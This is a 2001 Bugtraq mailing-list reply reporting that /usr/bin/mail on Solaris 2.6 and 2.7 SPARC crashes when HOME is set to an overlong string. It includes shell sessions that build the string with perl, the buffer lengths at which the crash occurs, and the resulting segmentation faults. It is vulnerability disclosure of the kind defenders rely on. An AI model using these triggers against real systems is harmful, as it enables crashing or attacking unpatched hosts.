Bugtraq mailing list archives

Re: $HOME buffer overflow in SunOS 5.8 x86

From: SChoe <schoe () CheapTickets COM>
Date: Tue, 5 Jun 2001 14:56:49 -1000 (HST)

Solaris/sparc appears not to be vulnerable.


Solaris 2.6/2.7 SPARC are also susceptable
to /usr/bin/mail buffer overflow.  Here are
the minimum buffer's usable to produce
segmentation faults.

<---------------------snip--------------------->
SunOS <hostname> 5.6 Generic_105181-23 sun4u sparc
bash-2.04$ export HOME=`perl -e 'print "A"x1293'`
bash-2.04$ mail a
^C
mail: Cannot create dead.letter
mail: ERROR signal 11
mail: Cannot create dead.letter
mail: ERROR signal 11
mail: Cannot create dead.letter
mail: ERROR signal 11
(........)
Segmentation Fault
bash-2.04$
<---------------------snap--------------------->

<---------------------snip--------------------->
SunOS <hostname> 5.7 Generic_106541-12 sun4u sparc SUNW,Ultra-4

bash-2.04$ export HOME=`perl -e 'print "A"x1099'`
bash-2.04$ mail a
^C
mail: ERROR signal 10
mail: ERROR signal 10
mail: ERROR signal 10
mail: ERROR signal 10
(........)
Segmentation Fault
bash-2.04$
<---------------------snap--------------------->

+--------------------------------------------------+
| Sung J. Choe / UNIX Admin / www.CheapTickets.com |
|                                                  |
|       Ph: 808/945.7439   Fax: 808/946.5993       |
:--------------------------------------------------+

Current thread:

$HOME buffer overflow in SunOS 5.8 x86 Georgi Guninski (Jun 04)
- Re: $HOME buffer overflow in SunOS 5.8 x86 Juergen P. Meier (Jun 05)
  - Re: $HOME buffer overflow in SunOS 5.8 x86 Gunnar Wolf (Jun 05)
    - Re: $HOME buffer overflow in SunOS 5.8 x86 Tohru Watanabe (Jun 05)
    - Re: $HOME buffer overflow in SunOS 5.8 x86 Patrick Finch (Jun 05)
    - Re: $HOME buffer overflow in SunOS 5.8 x86 Kris Kennaway (Jun 08)
- <Possible follow-ups>
- Re: $HOME buffer overflow in SunOS 5.8 x86 SChoe (Jun 05)
- Re: $HOME buffer overflow in SunOS 5.8 x86 Nicolas Dubee (Jun 05)